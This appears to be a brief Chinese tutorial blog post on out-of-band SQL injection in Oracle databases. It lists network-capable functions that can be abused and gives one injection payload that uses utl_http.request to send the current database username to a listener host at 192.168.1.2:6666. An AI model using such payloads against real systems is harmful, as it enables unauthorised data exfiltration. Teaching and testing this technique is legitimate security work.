Oracle数据库注入之带外注入
发布时间:2021-03-30 16:14:20
来源:
作者: 阿己
在Oracle的诸多注入手段中,带外注入类似于DNSlog需要通过使用网络请求的函数进行。
其中,可以进行网络请求的函数有SYS.DBMS_LDAP.INIT、UTL_INADDR.GET_HOST_ADDREss 和UTL_HTTP.REQUEST。
注入过程如下:
(一)检测函数是否能用
网页加载正常,则说明该函数可以使用;其中,函数返回值是请求的返回值。
为了获取当前用户名发送请求
1 and utl http.request('http://192.168.1.2:6666/'%7c%7c(SELECT user FROM dual))-1
(二)收集信息
通过发送Utl获取Banner信息和字段内容
上一篇: Oracle数据库注入之联合注入
下一篇: Oracle数据库注入之报错注入